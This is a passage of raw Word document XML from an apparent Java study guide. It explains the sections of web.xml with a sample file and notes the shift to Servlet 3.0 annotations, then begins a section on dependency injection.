          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>context parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> that can be accessed globally by servlets or filters within the application. They are often used to store configuration values that are shared across multiple components.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2613536F"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E748737"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t;context-param&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6774242B"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param-name&gt;appConfig&lt;/param-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9C61A1"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param-value&gt;/path/to/config/file&lt;/param-value&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="235A5FCA"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t;/context-param&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D199D6D" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188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Security Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3AB93EA8" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="188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Security constraints</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> can be defined in web.xml, specifying URL patterns that require authentication, as well as roles that are allowed access. It also configures login mechanisms like form-based login or basic authentication.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA5879F"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C50E1BD"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t;security-constraint&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05F0D69F"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web-resource-collection&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036645C4"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web-resource-name&gt;Admin Area&lt;/web-resource-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="058F25EE"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url-pattern&gt;/admin/*&lt;/url-pattern&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAED800"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web-resource-collection&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A16F36"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auth-constraint&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39344415"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role-name&gt;admin&lt;/role-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2524AED3"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auth-constraint&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B539C4A"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t;/security-constraint&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="219F68E0" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7B87105E"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t;login-config&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="078BF2CB"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auth-method&gt;BASIC&lt;/auth-method&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EEE06FA"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realm-name&gt;ExampleRealm&lt;/realm-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C8E6543"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t;/login-config&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DCF76E8" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188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Welcome File List</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B118BA1" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="188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It specifies the default page (welcome file) to be served when a user accesses the root directory of the web application (e.g., when they access http://localhost:8080/).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B26884F"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10484353"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t;welcome-file-list&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F4B8E1C"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welcome-file&gt;index.jsp&lt;/welcome-file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5097A289"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t;/welcome-file-list&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64433DDB" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188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Error Page Mapping</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02A8DD78" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="188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You can configure error pages in web.xml to display custom error messages when a certain HTTP error code is encountered, such as 404 (Page Not Found) or 500 (Internal Server Error).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2344EF15"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2694ABBC"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t;error-page&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308D1122"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error-code&gt;404&lt;/error-code&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ED703EB"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location&gt;/error/404.jsp&lt;/location&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09BE1B8D"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t;/error-page&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D33A725" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188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Session Configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21A015C1" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="1885"/>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It can define </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>session parameters</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>, such as session timeout.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="156F4264"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Example</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6852AF6C"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lastRenderedPageBreak/>
        <w:t>&lt;session-config&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4720ABCF"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session-timeout&gt;30&lt;/session-timeout&gt; &lt;!-- in minutes --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6BFB6A"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t;/session-config&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0898FBD6" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7"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Typical Structure of web.xml:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7001EA8D"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t;?xml version="1.0" encoding="UTF-8"?&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14900AB4"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t;web-app xmlns="http://java.sun.com/xml/ns/javaee"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74F74905"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xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DB93668"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xsi:schemaLocation="http://java.sun.com/xml/ns/javaee</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55691BB5"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http://java.sun.com/xml/ns/javaee/web-app_4_0.xsd"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C58C61F"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version="4.0"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34B56529"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2DF69DD4"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 Context Parameters --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="69118FE0"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context-param&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61C9779D"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param-name&gt;appConfig&lt;/param-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08FEA9D1"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param-value&gt;/path/to/config/file&lt;/param-value&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CC559FE"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context-param&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A1A3F6A" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4BFF8CB0"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 Servlet Definition --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C52B35"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servlet&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18175FFB"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servlet-name&gt;myServlet&lt;/servlet-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53C9DDD9"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servlet-class&gt;com.example.MyServlet&lt;/servlet-class&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0250BA7B"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servlet&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E0EC2B1"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4750017B"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 Servlet Mapping --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63559BEE"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servlet-mapping&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664BE7E7"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servlet-name&gt;myServlet&lt;/servlet-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="090C7F15"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url-pattern&gt;/myServlet&lt;/url-pattern&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F740D43"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servlet-mapping&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="622DABDD" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0D27260A"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 Filter Definition --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EAFE90"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filter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F34A53E"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filter-name&gt;authFilter&lt;/filter-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41B40793"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filter-class&gt;com.example.AuthenticationFilter&lt;/filter-class&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32937A41"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filter&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EC5E003"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682FA91B"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 Filter Mapping --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07775EBB"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filter-mapping&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0979F152"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filter-name&gt;authFilter&lt;/filter-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="262B91E9"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url-pattern&gt;/protected/*&lt;/url-pattern&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7089572E"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filter-mapping&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE2811C" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0F8003B0"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 Welcome File --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D1A3BB9"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welcome-file-list&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3271F84E"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welcome-file&gt;index.jsp&lt;/welcome-file&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="594FA8D8"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welcome-file-list&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="600D3E82" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7723EB79"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 Error Page --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380D7087"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error-page&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76A2B059"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error-code&gt;404&lt;/error-code&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A544735"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location&gt;/error/404.jsp&lt;/location&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E3CA646"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error-page&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27C3CC75" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D877641"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 Security Constraints --&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70D0559B"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security-constraint&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="03710BC8"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web-resource-collection&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22DD9D7F"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web-resource-name&gt;Admin Area&lt;/web-resource-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AEFE090"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">            &lt;url-pattern&gt;/admin/*&lt;/url-pattern&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F86BC78"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web-resource-collection&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EF91E5B"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auth-constraint&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360E964D"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role-name&gt;admin&lt;/role-name&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A8CA95"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auth-constraint&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E70A254"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lt;/security-constraint&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32102F15" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31EB05CE" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7"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lt;/web-app&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="204A8D20" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7"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Evolution and Modern Approach:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6714BD92" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1886"/>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With the introduction of </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Servlet 3.0+</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, many configurations in web.xml can be replaced with </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>annotations</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> such as @WebServlet, @WebFilter, and @WebListener, making the web.xml file less essential in modern web applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21B965AE" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1886"/>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While it's still a valid approach, </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java-based configuration</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (using @Configuration classes) has become more popular and is more flexible, especially with Spring-based applications.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="607E7D4E" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7"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Conclusion:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9A02E8" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1887"/>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web.xml is a critical part of the Java EE-based web applications for configuring servlets, filters, listeners, security, error pages, and more.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="026E7BDD" w14:textId="77777777" w:rsidR="00E664E7" w:rsidRPr="00085CB4" w:rsidRDefault="00E664E7" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1887"/>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Although Spring and newer Java specifications have reduced its necessity, it is still widely used and provides fine-grained control over web application deployment and configuration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="543A283D" w14:textId="136EB4A0" w:rsidR="00AD1E70" w:rsidRPr="00CE4B95"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48D7FDB">
          <v:rect id="_x0000_i2117" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FA71226" w14:textId="758D8628" w:rsidR="00A930F5" w:rsidRPr="00CE4B95" w:rsidRDefault="00DD1EB9">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="443" w:name="_Toc196307923"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is the dependency injection</w:t>
      </w:r>
      <w:r w:rsidR="00A930F5" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="443"/>
    </w:p>
    <w:p w14:paraId="44E8A117" w14:textId="46277B61" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>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Dependency Injection (DI)</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is a design pattern and one of the core concepts of </w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Inversion of Control (IoC)</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It is a technique in which an object (or class) receives its dependencies from an external source rather than creating them itself. DI helps in decoupling the objects from their dependencies, making the system more modular, testable, and maintainable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B78DB7B"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In simple terms, Dependency Injection allows you to inject the required objects (dependencies) into a class instead of the class creating them internally. This enables the class to focus on its core responsibility without worrying about the instantiation of dependencies.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5688B548" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6"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Types of Dependency Injection:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="559F5C74" w14:textId="77777777" w:rsidR="001627E6" w:rsidRPr="00085CB4" w:rsidRDefault="001627E6" w:rsidP="00085CB4">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="188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Constructor Injection</w:t>
      </w:r>
      <w:r w:rsidRPr="00085CB4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Dependencies are provided through the constructor of the class.</w:t>
      </w:r>
    </w:p>
